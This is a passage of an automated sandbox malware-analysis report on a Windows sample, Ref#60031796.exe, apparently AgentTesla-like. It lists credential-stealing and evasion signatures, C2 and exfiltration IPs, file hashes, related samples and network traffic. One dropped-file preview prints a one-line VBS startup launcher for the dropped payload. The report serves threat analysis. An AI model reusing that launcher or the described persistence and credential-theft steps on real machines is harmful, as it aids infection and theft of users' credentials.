                        Signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
                        Child process: InstallUtil.exe (started)
                          DNS/IP: 162.254.34.31, 49759, 587 VIVIDHOSTINGUS United States
                          DNS/IP: api.ipify.org 104.26.13.205, 443, 49751 CLOUDFLARENETUS United States
                          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
                      Process: wscript.exe (started)
                        Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Child process: vdvfyt.exe (started)
                          DNS/IP: 5.253.86.15, 443, 49779, 49973 HOSTSLICK-GERMANYNL Cyprus
                          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

Source | Detection | Scanner | Label | Link
Ref#60031796.exe | 13% | ReversingLabs | |
Ref#60031796.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\vdvfyt.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\vdvfyt.exe | 13% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://oshi.at/Dwhm | 0% | Avira URL Cloud | safe |
https://oshi.at/Dwhml | 0% | Avira URL Cloud | safe |
https://oshi.at/Dwhmt | 0% | Avira URL Cloud | safe |
http://oshi.at | 0% | Avira URL Cloud | safe |
https://oshi.atD | 0% | Avira URL Cloud | safe |
https://oshi.at | 0% | Avira URL Cloud | safe |
http://oshi.atd | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
oshi.at | 194.15.112.248 | true | false | | high
api.ipify.org | 104.26.13.205 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://oshi.at/Dwhm | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
194.15.112.248 | oshi.at | Ukraine | | 213354 | INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB | false
104.26.13.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | | 64200 | VIVIDHOSTINGUS | true
5.253.86.15 | unknown | Cyprus | | 208046 | HOSTSLICK-GERMANYNL | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567429
Start date and time: 2024-12-03 15:19:49 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ref#60031796.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@6/3@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 92%
                                                                          • Number of executed functions: 265
                                                                          • Number of non-executed functions: 42
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: Ref#60031796.exe

Time | Type | Description
09:20:40 | API Interceptor | 102x Sleep call for process: Ref#60031796.exe modified
09:21:06 | API Interceptor | 37x Sleep call for process: InstallUtil.exe modified
09:21:13 | API Interceptor | 470099x Sleep call for process: vdvfyt.exe modified
15:21:04 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                                                                                                          1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                                          • 194.15.112.203
                                                                                                          bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.113.200
                                                                                                          FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.70
                                                                                                          x.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.113.210
                                                                                                          CLOUDFLARENETUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.6
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.6
                                                                                                          2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 172.67.201.49
                                                                                                          2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.6
                                                                                                          VIVIDHOSTINGUSRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                          • 162.254.34.31
                                                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 192.26.155.193
                                                                                                          Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 162.254.34.31
                                                                                                          BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          HOSTSLICK-GERMANYNLRef#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 5.253.86.15
                                                                                                          an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                          • 193.142.146.64
                                                                                                          an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          build.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                                                                                                          • 193.142.146.203
                                                                                                          ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                                                                                                          • 193.142.146.203
                                                                                                          Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.43
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):84
                                                                                                          Entropy (8bit):4.788707608442598
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:FER/n0eFHHoN+EaKC5NkOAHn:FER/lFHIN7aZ5WOO
                                                                                                          MD5:53B3D1B5924EB569FE27261293C7F23D
                                                                                                          SHA1:4F51CFE9EA01334071F43998786A082799188553
                                                                                                          SHA-256:F73CBEF4A35F378A34AC6313EC2966878B1A3D1CA281011E9F51486788FF23CD
                                                                                                          SHA-512:25E902328246792637891E9B61F61F83253327DFD7C8D5C31F22D81487974F9C7BDCAFBD6EE5176FB2AF3F3E230C7A04EE9E0348C22296AD529DEEA3FBB568A2
                                                                                                          Malicious:true
                                                                                                          Reputation:low
                                                                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221664
                                                                                                          Entropy (8bit):5.726317811710196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:tO9M5DN75XhrggS/mKjnfzhzFvkCwf32v0whH0ixM:tO8Nea
                                                                                                          MD5:654AD72D10AED979428B6B130700754A
                                                                                                          SHA1:68B0DB31A9CAB6FCC804DC6932D44D9081B14C14
                                                                                                          SHA-256:2F9639175E04906207564913E4C0493B196F59DD4BC8F62DEEA0ECECB4346891
                                                                                                          SHA-512:64447CAFF7BA9D358624F85B1AD00ABEAFE46E84703F69828F8E3F452145044FB6FBF1BF2BE71F7F32C946091298462C2E681370E5CC5A2B03614360C7EA9BEA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                                                                          Reputation:low
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):5.726317811710196
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:Ref#60031796.exe
                                                                                                          File size:221'664 bytes
                                                                                                          MD5:654ad72d10aed979428b6b130700754a
                                                                                                          SHA1:68b0db31a9cab6fcc804dc6932d44d9081b14c14
                                                                                                          SHA256:2f9639175e04906207564913e4c0493b196f59dd4bc8f62deea0ececb4346891
                                                                                                          SHA512:64447caff7ba9d358624f85b1ad00abeafe46e84703f69828f8e3f452145044fb6fbf1bf2be71f7f32c946091298462c2e681370e5cc5a2b03614360c7ea9bea
                                                                                                          SSDEEP:6144:tO9M5DN75XhrggS/mKjnfzhzFvkCwf32v0whH0ixM:tO8Nea
                                                                                                          TLSH:A6243229E3C0E8EFDC81B73230572B1777349D80AB9F8E06AD61B5EC1DB17C62596198
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng.................0...........O... ...`....@.. ....................................`................................
                                                                                                          Icon Hash:b04a484c4c4a4eb0
                                                                                                          Entrypoint:0x424f82
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x674EF1D0 [Tue Dec 3 11:56:00 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before, Not After
                                                                                                          • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                          Subject Chain
                                                                                                          • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                          Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                                          Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                                          Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24f38 | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26000 | 0x10e4e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x34400 | 0x1de0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x38000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x22f88 | 0x23000 | 2ea82fd39e8d48687f11e66a7f11baa7 | False | 0.38919503348214285 | data | 5.706214258576581 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x26000 | 0x10e4e | 0x11000 | dc5d679a1f01d28ae8a31ab5bc57d55c | False | 0.05648265165441176 | data | 4.113628969869284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x38000 | 0xc | 0x200 | 53a9fec949eba3715ccae811c97f7ac5 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2606c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.046492369572932686
RT_GROUP_ICON | 0x368d0 | 0x14 | data | | | 1.15
RT_VERSION | 0x36920 | 0x308 | data | | | 0.4497422680412371
RT_MANIFEST | 0x36c64 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T15:20:35.207129+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.6 | 49759 | 162.254.34.31 | 587 | TCP
2024-12-03T15:22:44.360977+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49973 | 5.253.86.15 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Dec 3, 2024 15:20:44.997344017 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.997391939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.001880884 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.001938105 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.003726006 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.003789902 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.009341002 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.009402990 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.011529922 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.011584997 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.013238907 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.013298988 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.017580986 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.017642975 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.021766901 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.021847963 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.025012016 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.025078058 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.027050018 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.027112007 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.031104088 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.031160116 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.034919024 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.034997940 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.052695036 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.052784920 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.133656979 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.133747101 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.134649038 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.134716034 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.136271000 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138432026 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138498068 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.138511896 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138556004 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.145246983 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.145311117 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.146394014 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.146455050 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.148876905 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.148941994 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.154308081 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.154377937 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.156461954 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.156537056 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.161312103 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.161381006 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.161422968 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.161475897 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.164037943 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.164103031 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.166809082 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.166873932 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.168477058 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.168549061 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.171360016 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.171423912 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.172696114 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.172768116 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.370745897 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.370893955 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.372195005 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.372265100 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.374030113 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.374095917 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.376512051 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.376586914 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.378499985 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.378566980 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.379595995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.379663944 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.381412983 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.381472111 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.383441925 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.383505106 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.384505987 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.384586096 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.386274099 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.386337042 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.387748003 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.387809038 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.521085978 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.521209955 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.523380995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.523467064 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.524964094 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.525042057 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.526144028 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.526223898 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.528235912 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.528312922 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.530339956 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.530424118 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.531673908 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.531739950 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.533591986 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.533654928 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.535917044 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.535983086 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.536685944 CET44349715194.15.112.248192.168.2.6
